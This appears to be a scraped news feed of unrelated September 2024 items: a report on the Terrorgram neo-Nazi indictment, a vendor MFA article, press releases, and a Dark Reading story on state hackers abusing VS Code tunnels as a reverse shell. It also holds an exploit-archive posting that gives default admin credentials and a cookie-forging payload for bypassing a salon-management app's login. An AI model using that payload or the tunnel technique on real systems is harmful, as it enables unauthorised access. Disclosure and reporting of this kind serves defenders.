The federal indictment of two alleged members of the Terrorgram Collective, a far-right cell accused of inspiring “lone wolf” attacks, reveals the US is now using a “forgotten” legal strategy.

On Monday, United States prosecutors in Sacramento, California, unveiled a 15-count indictment accusing Dallas Erin Humber, 34, and Matthew Robert Allison, 37, of serving as core members of a virulent neo-Nazi propaganda network that solicited attacks on federal officials, power infrastructure, people of color, and material support for acts of terrorism both within the US and overseas.

The group, known as the Terrorgram Collective, has produced four publications to date—a blend of ideological motivation, mass murder worship, neofascist indoctrination, and how-to manuals for chemical weapons attacks, infrastructure sabotage, and ethnic cleansing. The screeds have directly inspired a series of ideologically motivated attacks around the world, including a 2022 mass shooting at an LGBTQ bar in Bratislava, Slovakia; successful attacks on power infrastructure in North Carolina and similar failed plots in Baltimore and New Jersey; and a stabbing spree in the Turkish city of Eskisehir.

Federal prosecutors allege Humber, Allison, and other Terrorgram Collective members were in the process of compiling a fifth, yet-to-be-released publication devoted to a pantheon of “saints”—neofascist mass murderers like Timothy McVeigh and Anders Breivik. The point of this guide, prosecutors claim, was to “inspire Terrorgram users to commit acts of violence.”

Humber and Allison were both federal targets as early as early 2023, but authorities appear to have waited for a year and a half to compile evidence of potential attacks around the world, and for the British government’s decision this April to formally ban the Terrorgram Collective, before filing an indictment that could land the defendants in prison for more than two centuries. To date, American authorities have charged at least four individuals allegedly involved in the Terrorgram Collective with terrorism-related offenses.

While the arrests are not the first targeting the Terrorgram Collective—Slovakian Pavol “SlovakBro” Beňadik and former Atomwaffen Division founder Brandon Russell hold that honor—the charges against Humber and Allison represent a major change from how the FBI and US Department of Justice approach diffuse “accelerationist” terrorism—the nihilist brand of neofascism that seeks to speed up societal collapse and the ascent of a Fourth Reich through mass shootings, bombings, and other acts of terrorism by “lone wolf” actors. Relying on the UK government’s April order declaring the Terrorgram Collective a banned terrorist group and a little-employed section of the “material support for terrorism” section of the US criminal code, federal prosecutors are finally taking an aggressive, whole-of-law approach to violent neofascist extremism.

“What it shows is exactly what I’ve been arguing for years: All the tools they need to do this work, they have,” says Michael German, a former FBI special agent and a liberty and national security fellow at the Brennan Center for Justice, an NYU School of Law nonprofit. German points to years of arguments by the FBI and Department of Justice that they are hamstrung by existing laws when it comes to tackling violent extremists within the United States. “It also reveals the false separation that the government makes about international and domestic terrorism—white supremacy has always been transnational.”

In 2018, German coauthored a study of federal domestic terrorism prosecutions that argued existing laws were sufficient to tackle domestic terrorism, pointing to a particular statute used to charge Humber and Allison with material support. “It’s the material support statute the DOJ forgot,” says German.

The UK’s order against the Terrorgram Collective provided American authorities a basis for labeling a diffusive, ostensibly domestic propaganda group as a “transnational terrorist organization” in a detention motion filed on Tuesday, potentially opening Humber and Allison up to deleterious additional charges and sentencing enhancements. In other words, the US is treating Terrorgram in ways similar to how it has treated Islamist terrorist organizations.

“I would think of this case more like an old-school terrorism investigation, where you have a leadership cell that pushed info to followers and radicalized them into action,” says Seamus Hughes, a terrorism researcher at the University of Nebraska Omaha, of the indictment’s allegations against Humber and Allison.

The role of undercover agents in at least two of the Terrorgram federal prosecutions, the DOJ’s repeated citation of the group’s outlawed status in Great Britain as basis for labeling it a transnational terrorism organization, and the alleged targeting of power infrastructure by participants in the propaganda network, Hughes says, all point to US law enforcement taking a new approach to tackling violent right-wing extremism.

“The vast majority of material support cases are jihadi, but right here, they \[allegedly\] inspired an individual to plot an attack against a power plant,” he adds. “That’s critical infrastructure and is the lynchpin for the material support of terrorism charge.”

The power infrastructure plot Hughes references is the case of Andrew Takhistov, an 18-year-old New Jersey man charged in July with soliciting another individual to attack energy facilities. Court documents describe Tahkistov as a virulently hateful young man who fantasized about attacking a synagogue and participated in a March 2024 demonstration by an Atlantic City–based “active club” in support of jailed neo-Nazi leader Robert Rundo, was ever-present in the Terrogram Collective’s Telegram channels.

Along with allegedly circulating propaganda from the Terrorgram Collective and urging lone-wolf attacks, the feds claim in court records that Tahkistov bragged about participating in the production of the group’s “Hard Reset” publication, describing it as “the perfect starting guide” for a lone-wolf terrorist. “It has ideology, it has how-to guides, it has ideas for funny things, it goes into how you should plan it, it goes into the thought process,” Takhistov allegedly told an undercover FBI agent with whom he plotted the erstwhile attack on power stations near North Brunswick and New Brunswick, New Jersey.

These details were included in Tahkistov’s indictment, which also outlined his alleged plans to travel to Russia and join the Russian Volunteer Corps, a neo-Nazi combat battalion fighting for the Ukrainian military, which was founded by Denis Kapustin, an Azov Movement–connected extremist who tried to help Rundo flee the US in 2018, in order to gain weapons expertise and military training that would allow him to carry out more effective acts of ideologically motivated terrorism once back in the United States.

Takhistov is in custody and will next appear in court on October 9. He has pleaded not guilty.

Humber and Allison are longtime radicals. Humber’s radicalization appeared to start decades ago, per a report by extremism researchers at Left Coast Right Watch. Research obtained by this reporter shows Humber ran more than two dozen extreme right-wing propaganda channels on Telegram, which circulated the Terrorgram Collective’s material as well as other accelerationist content.

In recent years, aside from narrating audio books of neofascist manifestos and propaganda tracts, Humber also corresponded with convicted domestic terrorist Dylann Roof and with Atomwaffen Division founder Brandon Russell, who ended up joining their collective. “There’s no quitting our worldview. It’s a lifelong commitment,” Humber allegedly told Russell in a recorded jailhouse call following the latter’s arrest in February 2023. Her participation in the network, according to a March 15, 2022, Telegram post included in court filings by prosecutors, was to mold potential terrorists for action. “No military is fighting for us. No govt is protecting our people and defending our interests. The ONLY people fighting for us are lone wolves,” Humber wrote, in reference to a teenager she was trying to indoctrinate. “He’s like 18 yo and seems very impressionable, I’m trying to radicalize him.”

When the FBI raided Humber’s Elk Grove home last week, they recovered reams of Nazi propaganda, 3D-printed firearms—including a homemade AR-15 pattern rifle—a short-barreled rifle, a 3D printer, unregistered handguns, and high-capacity magazines, which remain illegal in California. She remains held without bail.

Allison, who was born in Southern California, lives in a high-end apartment building in downtown Boise, Idaho, and, according to court documents, does not hold a steady job. He doesn’t appear to have a criminal record, aside from a June 2022 misdemeanor. There are very few traces of Allison online, but details cobbled together by researchers indicate he drifted steadily to the right from 2018 onward, starting with the former Fox News host Tucker Carlson’s content and then moving steadily in the direction of Timothy McVeigh, The Order founder Robert Jay Mathews, and finally, the skull-masked, nihilistic neofascism popularized by the Atomwaffen Division at the end of the last decade.

Under the alias “BanThisChannel,” Allison was one of the most prolific disseminators of Terrorgram’s propaganda materials and was prolific in extreme-right-wing Telegram channels, commiserating with other SoCal skinheads about racial attacks in days gone by and connecting other individuals to militant groups like the Atomwaffen Division. Research obtained by this reporter indicates he worked part-time as a video producer and was the editor who compiled a number of “sizzle reels” for the Terrorgram Collective’s propaganda output online, including a set entitled “The BTC Movie Trilogy” that Takhistov sought out for inspiration.

Nineteen-year-old Slovakian teenager Juraj Krajčík, the perpetrator of the 2022 Bratislava massacre, was in extensive contact with Humber and Allison for at least a year prior to the attack, and sent his manifesto to Allison after he carried out his mass murder, which explicitly cited Terrorgram Collective publications and thanked the group for inspiring him to act. Allison then circulated the manifesto through the group’s Telegram channels. The group proceeded to claim Krajčík as “their first saint.”

Allison’s commitment to neofascism and white supremacy appears to have run deep—“I won’t quit til I’m dead. my only goal in life is to fucking destroy the enemy,” Allison declared in a Telegram post cited by federal prosecutors. Both he and Humber, according to a government detention motion, sought to identify the informant in Brandon Russell’s criminal case. Allison advocated adding the suspected snitch to “The List” (a collection of federal officials, journalists, businessmen, and other perceived enemies circulated by the Terrorgram Collective as potential assassination targets), while Humber allegedly told Russell in a recorded jailhouse call in August 2023 that she had photographs of the suspected informant and was running them through facial recognition software.

When Allison was arrested last week, authorities say, he had a backpack loaded with what appeared to be a “bug-out kit” comprised of zip ties, a gun, duct tape, ammunition, a knife, lockpicking tools, two phones, and a thumb drive. When law enforcement searched his apartment, they turned up an assault rifle, two laptops, an external hard drive, and another “go bag” containing $1,500 in cash, clothes, a passport, ziplock bags full of pills, ammunition, a skull mask balaclava, sim cards, and a birth certificate.

In a videotaped interview following his arrest, Allison allegedly confessed to his participation in the Terrorgram Collective and “engaging in acts alleged in the General Allegations of the Indictment.”

Law enforcement consider Humber and Allison threats to their community, and to authorities as well: Humber allegedly worked with Russell to try to identify a suspected government witness in the Atomwaffen Division founder’s current criminal case in Baltimore, according to recorded jailhouse phone calls. Witnesses in Russell’s upcoming trial this November will testify in a closed courtroom to avoid being identified, a highly unusual precaution. In a sealing motion, prosecutors state that not only are additional arrests of Terrogram Collective members likely, but the group’s membership poses a severe danger to law enforcement and cooperating witnesses alike: “Defendants' many associates, both in the United States and internationally, may seek to harm perceived law enforcement or law enforcement cooperators in retribution for their role in this investigation.”

Allison is currently detained without bail and is set to appear in federal court in Boise on September 18 for a detention hearing.

The volume of evidence laid out against Humber and Allison in both the indictment and detention motion, says Hughes, shows the feds have significantly altered their approach to both far-right terrorism and particularly "lone wolf" accelerationists who have perpetrated massacres ranging from Christchurch in 2019 to Buffalo in 2022.

“When they go further than they have in the past to lay out the transnational connections and overlay a material support charge, it shows that either the feds are trying to make a point, or they were very concerned about these particular actors,” Hughes says.

Senior attorneys from the DOJ’s Civil Rights and National Security divisions are listed on the court filings in this matter, another indication that the top ranks of the Biden administration’s Justice Department called the shots on the Terrorgram Collective investigation.

“To build a case in this fashion is a decision that gets made at Main Justice,” Hughes says. “Someone high up decided to sign off on this.”

‘Terrorgram’ Charges Show US Has Had Tools to Crack Down on Far-Right Terrorism All Along

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible. 
However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to

Even as cyber threats become increasingly sophisticated, the number one attack vector for unauthorized access remains phished credentials (Verizon DBIR, 2024). Solving this problem resolves over 80% of your corporate risk, and a solution is possible.

However, most tools available on the market today cannot offer a complete defense against this attack vector because they were architected to deliver probabilistic defenses. Learn more about the characteristics of Beyond Identity that allow us to deliver deterministic defenses.

****The Challenge: Phishing and Credential Theft****

Phishing attacks trick users into revealing their credentials via deceptive sites or messages sent via SMS, email, and/or voice calls. Traditional defenses, such as end-user training or basic multi-factor authentication (MFA), lower the risk at best but cannot eliminate it. Users may still fall prey to scams, and stolen credentials can be exploited. Legacy MFA is a particularly urgent problem, given that attackers now bypass MFA at scale prompting NIST, CISA, OMB, and NYDFS to issue guidances for phishing-resistant MFA.

****Beyond Identity's Approach: Deterministic Security******Eliminate Phishing**

Shared secrets, like passwords and OTPs, are inherently vulnerable because they can be intercepted or stolen. Beyond Identity uses public-private key cryptography, or passkeys, to avoid these risks and never falls back to phishable factors like OTP, push notifications, or magic links.

While public key cryptography is robust, the safety of private keys is crucial. Beyond Identity utilizes secure enclaves—specialized hardware components that safeguard private keys and prevent unauthorized access or movement. By ensuring all authentications are phishing-resistant and leveraging device-bound, hardware-backed credentials, Beyond Identity provides assurance against phishing attacks.

**Prevent Verifier Impersonation**

Recognizing legitimate links is impossible for human beings. To address this, Beyond Identity authentication relies on a Platform Authenticator, which verifies the origin of access requests. This method helps prevent attacks that rely on mimicking legitimate sites.

**Eliminate Credential Stuffing**

Credential stuffing is an attack where bad actors test stolen username and password pairs to attempt to gain access. Typically, the attack is carried out in an automated manner.

Beyond Identity addresses this by eliminating passwords entirely from the authentication process. Our passwordless, phishing-resistant MFA allows users to log in with a touch or glance and supports the broadest range of operating systems on the market, including Windows, Android, macOS, iOS, Linux, and ChromeOS, so users can log in seamlessly no matter what device they prefer to use.

**Eliminate Push Bombing Attacks**

Push bombing attacks flood users with excessive push notifications, leading to accidental approvals of unauthorized access. Beyond Identity mitigates this risk by not relying on push notifications.

Additionally, our phishing-resistant MFA enables device security checks on every device, managed or unmanaged, using natively collected and integrated third-party risk signals so you can ensure device compliance regardless of the device.

**Enforce Device Security Compliance**

During authentication, it's not just the user that's logging in, it's also their device. Beyond Identity is the only IAM solution on the market that delivers fine-grained access control that accounts for real-time device risk at the time of authentication and continuously during active sessions.

The first benefit of a platform authenticator is the ability to provide verifier impersonation resistance. The second benefit is that, as an application that lives on the device, it can provide real-time risk data about the device, such as firewall enabled, biometric-enabled, disk encryption enabled, and more.

With the Beyond Identity Platform Authenticator in place, you can have guarantees of user identity with phishing-resistant authentication and enforce security compliance on the device requesting access.

**Integrating Risk Signals for Adaptive Access**

Given the proliferation of security tools, risk signals can come from various disparate sources ranging from mobile device management (MDM), endpoint detection and response (EDR), Zero Trust Network Access (ZTNA), and Secure Access Service Edge (SASE) tools. Adaptive, risk-based access is only as strong as the breadth, freshness, and comprehensiveness of risk signals that are fed into its policy decisions.

Beyond Identity provides a flexible integration architecture that prevents vendor lock-in and reduces the complexity of admin management and maintenance. Additionally, our policy engine allows for continuous authentication, so you can enforce comprehensive risk compliance even during active sessions.

**Ready to experience phishing-resistant security?**

Don't let outdated security measures leave your organization vulnerable when there are solutions available that can dramatically reduce your threat landscape and eliminate credential theft.

With Beyond Identity, you can safeguard access to your critical resources with deterministic security. Get in touch for a personalized demo to see firsthand how the solution works and understand how we deliver our security guarantees.

Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Say Goodbye to Phishing: Must-Haves to Eliminate Credential Theft

Singapore, Singapore, 13th September 2024, CyberNewsWire

**Singapore, Singapore, September 13th, 2024, CyberNewsWire**

SquareX has been named a winner of the prestigious Rising Star category in **CybersecAsia Readers’ Choice Awards 2024** **Awards****,** due to its outstanding achievements in its innovative browser security solutions.

For the past 5 years, this award has been honouring cybersecurity organizations that are making a significant impact and delivering ground breaking solutions to help enterprises in the region to defend against cyberthreats.

Held at Network Hub @ Guoco Midtown, this highly sought after event was attended by more than 70 cybersecurity industry veterans, regional CISOs and cybersecurity practitioners who witnessed and recognized winners across more than 20 award categories. 

> “Ever since web browsers became the de facto interface for the Internet, they have also provided the biggest attack surface for bad actors,” said Victor Ng, Editor-in-Chief of CybersecAsia. “As Asia Pacific becomes a more connected and digital economy, the cyber risks posed by browsers have loomed larger. That’s why we need real-time browser-native detection and response solutions, and SquareX – launched in 2023 out of Singapore – is a Rising Star providing such solutions to mitigate the risks from web-based threats.”

> “SquareX is honoured to be recognized as a Rising Star winner in CybersecAsia Readers’ Choice 2024 Awards because it demonstrates the crucial role and impact that browser security is bringing to the cybersecurity landscape,” said Vivek Ramachandran, Founder & CEO of SquareX.

Vivek Ramachandran continued to emphasize the critical need for effective enterprise browser security:

> “The browser is the most used tool by enterprises but also the least protected – making it a gateway to most attacks. Enterprises need robust solutions to protect themselves from web attacks happening to enterprise users in real-time. Our browser security detection and response solution is able to detect and mitigate web threats as they happen, ensuring that enterprises are protected at all times.” added Vivek Ramachandran.

SquareX is privileged to receive this accolade from CybersecAsia as it validates the company’s exceptional performance in mitigating web-based threats, and solidifies its leadership position in the browser security space. The team remains committed to safeguarding enterprises and their employees.

**About SquareX:**

SquareX helps organizations detect, mitigate and threat-hunt client-side web attacks happening against their users in real time.

SquareX’s industry-first Browser Detection and Response (BDR) solution, takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

With SquareX, enterprises can provide contractors and remote workers with secure access to internal applications, enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions.

For more information, readers can visit http://www.sqrx.com

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

SquareX, Awarded Rising Star Category in CybersecAsia Readers’ Choice Awards 2024

A technique to abuse Microsoft's built-in source code editor has finally made it into the wild, thanks to China's Mustang Panda APT.

Source: Postmodern Studio via Alamy Stock Photo

A Chinese state-aligned espionage group has become the first documented threat actor to weaponize a known exploit in VS Code in a malicious attack.

Visual Studio Code, or VS Code, is Microsoft's free source code editor for Windows, Linux, and macOS. According to Stack Overflow's 2023 survey of 86,544 developers, it's the most popular integrated development environment (IDE) among both new (78%) and professional developers (74%), by some distance. The next most popular IDE, Visual Studio, was used by 28% of respondents.

In September 2023, a threat researcher described how an attacker could take advantage of a VS Code feature called "Tunnel" to gain initial access to a target's environment. Initially, the tactic was just fodder for red teaming. Now, according to Palo Alto Networks' Unit 42, China's Mustang Panda (aka Stately Taurus, Bronze President, RedDelta, Luminous Moth, Earth Preta, and Camaro Dragon) has used it in an espionage attack against a government entity in southeast Asia.

"The technique described requires an attacker to have previously gained code execution privileges on a target machine," a Microsoft spokesperson tells Dark Reading. "As a security best practice, we encourage customers to practice good computing habits online, including exercising caution when clicking on links to web pages or opening unknown files."

**Turning VS Code Into a Reverse Shell**

"One of the worst fears as a cybersecurity expert is detecting and preventing a signed reverse shell binary," Truvis Thornton wrote, a whole year prior to Unit 42's latest research. "Guess what? Microsoft gladly gave us one."

First introduced in July 2023, VS Code Tunnel allows users to share their VS Code environments on the open Web, and only requires authentication through a GitHub account.

An attacker with their victim's GitHub credentials could do damage, but much worse is the fact that one can remotely install a portable version of VS Code on a targeted machine. Because it's a legitimate signed binary, it will not be flagged as suspicious by security software.

And yet, it will walk and talk like a reverse shell. By running the command "code.exe tunnel," the attacker opens a GitHub authentication page, which they can log into with their own account. Then they're redirected to a VS Code environment connected to their target's system, and free to execute commands and scripts and introduce new files at will.

Mustang Panda — a 12-year-old advanced persistent threat (APT) known for espionage against governments, nongovernmental organizations (NGOs), and religious groups in Asia and Europe — used this playbook to perform reconnaissance against its target, drop malware, and, most importantly for its purposes, exfiltrate sensitive data.

**How to Deal with VSCode**

"While the abuse of VSCode is concerning, in our opinion, it is not a vulnerability," Assaf Dahan, director of threat research for Unit 42, clarifies. Instead, he says, "It's a legitimate feature that was abused by threat actors, as often happens with many legitimate software (take lolbins, for example)."

And there are a number of ways organizations can protect against a bring-your-own-VSCode attack. Besides hunting for indicators of compromise (IoCs), he says, "It's also important to consider whether the organization would want to limit or block the use of VSCode on endpoints of employees that are not developers or do not require the use of this specific app. That can reduce the attack surface." 

"Lastly, consider limiting access to the VSCode tunnel domains '.tunnels.api.visualstudio\[.\]com' or '.devtunnels\[.\]ms' to users with a valid business requirement. Notice that these domains are legitimate and are not malicious, but limiting access to them will prevent the feature from working properly and consequently make it less attractive for threat actors," he adds.

**A Second, Overlapping Attack**

While investigating the Mustang Panda attack, Unit 42 came across a second threat cluster occupying the same target's systems.

In this case, the attacker abused imecmnt.exe — a legitimate and signed file associated with Microsoft's Input Method Editor (IME), used for generating text in languages not conducive to the QWERTY keyboard — with some dynamic link library (DLL) sideloading. The file they dropped, ShadowPad, is a 7-year-old modular backdoor popular among Chinese threat actors.

This compromise occurred at the same time as the VS Code exploitation, often on the same endpoints, and the overlaps didn't end there. Still, researchers couldn't say for certain whether this second cluster of malicious activity could be attributed to Mustang Panda. "There could also be other possible scenarios to explain this connection," they wrote. "For example, it could be a joint effort between two Chinese APT groups or perhaps two different groups piggybacking on each other's access."

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Microsoft VS Code Undermined in Asian Spy Attack

PRESS RELEASE

DELRAY BEACH, Fla., Sept. 10, 2024 /PRNewswire/ -- The global Security Testing Market size is projected to grow from USD 14.5 billionin 2024 to USD 43.9 billion by 2029 at a Compound Annual Growth Rate (CAGR) of 24.7% during the forecast period, according to a new report by MarketsandMarkets™.

One of the key factors promoting the security testing will be the increasing incidence of cyberattacks that target the software's vulnerabilities. However, the organizations, being in the digitalized world are getting more and more dependent on the digital applications that require the identification of the system's security risks and their resolution before the potential exploitation of such risks by the attackers which is becoming the new crucial practice. This rising concern pushes organizations to adopt the security testing process in order to guard their systems, data, and reputation from the possible breaches.

Request Sample Pages@ https://www.marketsandmarkets.com/requestsampleNew.asp?id=150407261

Based on the application testing tools, SAST accounts for the highest market size during the forecast period.

The adoption of Static Application Security Testing (SAST) tools is increasing as organizations prioritize secure software development. SAST tools enable developers to identify and fix security vulnerabilities early in the coding process, reducing the risk of security flaws in production. This shift is driven by the growing emphasis on integrating security into the software development lifecycle (SDLC) and the need to comply with stringent security standards. As a result, more companies are adopting SAST tools to enhance code security, improve development efficiency, and ensure that applications are robust against cyber threats from the outset.

By Application security testing type, web application security testing accounts for the highest market size during the forecast period.

The adoption of web application security testing is growing as organizations increasingly rely on web-based platforms for business operations and customer interactions. With the rise in cyber threats targeting web applications, such as SQL injection and cross-site scripting (XSS), companies are prioritizing security testing to identify and mitigate vulnerabilities before they can be exploited. This proactive approach is driven by the need to protect sensitive data, ensure compliance with regulations, and maintain customer trust in an environment where web applications are a critical part of the business landscape.

Inquire Before Buying@ https://www.marketsandmarkets.com/Enquiry\_Before\_BuyingNew.asp?id=150407261

By Region, Asia Pacific will grow at the highest CAGR during the forecast period.

The adoption of security testing services in the Asia Pacific region is rapidly increasing due to the region's expanding digital economy and the rising threat of cyberattacks. As businesses in Asia-Pacific embrace digital transformation and cloud computing, the need to identify and address vulnerabilities in their systems has become crucial. Regulatory pressures and growing awareness of cybersecurity risks are also driving organizations to invest in security testing solutions to ensure the resilience of their IT infrastructure and protect sensitive data from breaches. This trend is further fueled by the region's diverse and complex threat landscape, prompting a proactive approach to cybersecurity.

Top Key Companies in Security Testing Market:

IBM (US), HCLTech (India), Synopsys (US), OpenText (UK), Cigniti (US), Qualitest (UK), Intertek (UK), DXC Technology (US), eInfochips (US), Checkmarx (US), HackerOne (US), Invicti (US), DataArt (US), Cobalt Labs (US), Trustwave (US), Contrast Security (US), Veracode (US), Qualys (US), OffSec (US), NCC Group (UK), GitHub (US), Bugcrowd (US), Applause (US), Rapid7 (US), Parasoft (US), BreachLock (US), ImmuniWeb (Switzerland), Pentest People (UK), SafeAeon (US), and REDTEAM.PL (Poland) are the key players and other players in the Security Testing Market.

Browse Adjacent Market: Information Security Market Research Reports & Consulting

Browse Other Reports:

Blockchain Security Market - Global Forecast to 2029

IoT Security Market - Global Forecast to 2029

Exposure Management Market\- Global Forecast to 2029

Next-Generation Firewall Market\- Global Forecast to 2028

Digital Signature Market\- Global Forecast to 2028

Get access to the latest updates on Security Testing Companies and Security Testing Industry

About MarketsandMarkets™ 

MarketsandMarkets™ has been recognized as one of America's best management consulting firms by Forbes, as per their recent report.

MarketsandMarkets™ is a blue ocean alternative in growth consulting and program management, leveraging a man-machine offering to drive supernormal growth for progressive organizations in the B2B space. We have the widest lens on emerging technologies, making us proficient in co-creating supernormal growth for clients.

Earlier this year, we made a formal transformation into one of America's best management consulting firms as per a survey conducted by Forbes.

The B2B economy is witnessing the emergence of $25 trillion of new revenue streams that are substituting existing revenue streams in this decade alone. We work with clients on growth programs, helping them monetize this $25 trillion opportunity through our service lines - TAM Expansion, Go-to-Market (GTM) Strategy to Execution, Market Share Gain, Account Enablement, and Thought Leadership Marketing.

Built on the 'GIVE Growth' principle, we work with several Forbes Global 2000 B2B companies - helping them stay relevant in a disruptive ecosystem. Our insights and strategies are molded by our industry experts, cutting-edge AI-powered Market Intelligence Cloud, and years of research. The KnowledgeStore™ (our Market Intelligence Cloud) integrates our research, facilitates an analysis of interconnections through a set of applications, helping clients look at the entire ecosystem and understand the revenue shifts happening in their industry.

To find out more, visit www.MarketsandMarkets™.com or follow us on Twitter, LinkedIn and Facebook.

Security Testing Market Worth $43.9B by 2029

PRESS RELEASE

REDDING, Calif., Sept. 10, 2024 /PRNewswire/ -- According to a new market research report titled, 'SCADA Market by Type (Monolithic SCADA Systems, Distributed SCADA Systems, Networked SCADA Systems), Component (Hardware, Software, Services), Deployment Mode, End-use Industry (Oil & Gas, Automotive, F&B)—Global Forecast to 2031.

The rising adoption of automated technologies across Europe and Asia-Pacific, the advent of Industry 5.0, the growing demand for smart and digitized production processes, and the increasing emphasis on industrial automation are key factors driving the growth of SCADA. However, the high initial investment requirements for SCADA implementation are restraining the growth of this market.

Furthermore, the growing adoption of wireless sensor networks and the proliferation of smart factories are expected to generate growth opportunities for the players operating in this market. However, the risk of cyberattacks is a major challenge impacting market growth. Furthermore, the rising adoption of Industry 4.0 technologies and the increasing reliance on Human-Machine Interface (HMI) systems are prominent trends in the SCADA market.

Advent of Industry 5.0 Boosting the Demand for Scada Systems 

Industry 5.0, also known as the Fifth Industrial Revolution, is a new and emerging phase of industrialization that builds upon the principles of Industry 4.0 but emphasizes the human touch and the integration of human skills with advanced technologies. Industry 4.0 focused on technologies such as the Internet of Things and big data, whereas Industry 5.0 seeks to involve human, environmental, and social aspects.

As Industry 5.0 promotes enhanced collaboration between humans and machines, there is an increasing demand for sophisticated automation and control systems capable of effectively bridging the gap between these elements. SCADA systems facilitate real-time monitoring and control of industrial processes, playing an important role in enabling seamless interactions between humans and machines. They offer the necessary infrastructure for incorporating human input and feedback into automated workflows, thereby optimizing performance and efficiency. With Industry 5.0 driving the adoption of advanced technologies, the requirement for comprehensive monitoring and control solutions to ensure seamless integration and coordination is growing. SCADA systems have significantly improved the reliability and capability of automation. Centralized SCADA systems are increasingly utilized for decision-making in hazardous situations to prevent accidents in complex infrastructure. These systems oversee and manage entire sites, support informed decision-making, enhance efficiency, and minimize downtime. The advantages provided by SCADA systems, coupled with the escalating need to maintain the integrity and reliability of critical infrastructure, are driving market growth.

Governments are actively supporting industrial automation and digitalization initiatives. For example, in January 2021, the President of Spain introduced three new plans for SMEs (2021-2025)—the Connectivity Plan, the Strategy to Promote 5G Plan, and the National Strategy for Artificial Intelligence. These plans are part of the Spain 2025 Digital Agenda and aim to advance the development and deployment of SCADA systems across various industries. By enhancing capabilities and driving digital transformation, these initiatives are increasing demand for SCADA systems and contributing to market growth.

SCADA Market Analysis: Key Segmental Findings

*   By Type: In 2024, the networked SCADA systems segment is expected to account for the largest share of 47.5% of the SCADA market. Moreover, this segment is projected to register the highest CAGR of 8.2% during the forecast period from 2024 to 2031.
    
*   By Component: In 2024, the hardware segment is expected to account for the largest share of 55.9% of the SCADA market. However, the software segment is estimated to record the highest CAGR during the forecast period from 2024 to 2031.
    
*   By Deployment Mode: In 2024, the on-premise deployments segment is expected to account for the dominant share of the SCADA market. However, the cloud-based deployments segment is anticipated to register the highest CAGR of 10.5% during the forecast period from 2024 to 2031.
    
*   By End-use Industry: In 2024, the manufacturing segment is expected to account for the major share of 26.4% of the SCADA market. However, the automotive segment is slated to record the highest CAGR of 10.7% during the forecast period from 2024 to 2031.
    

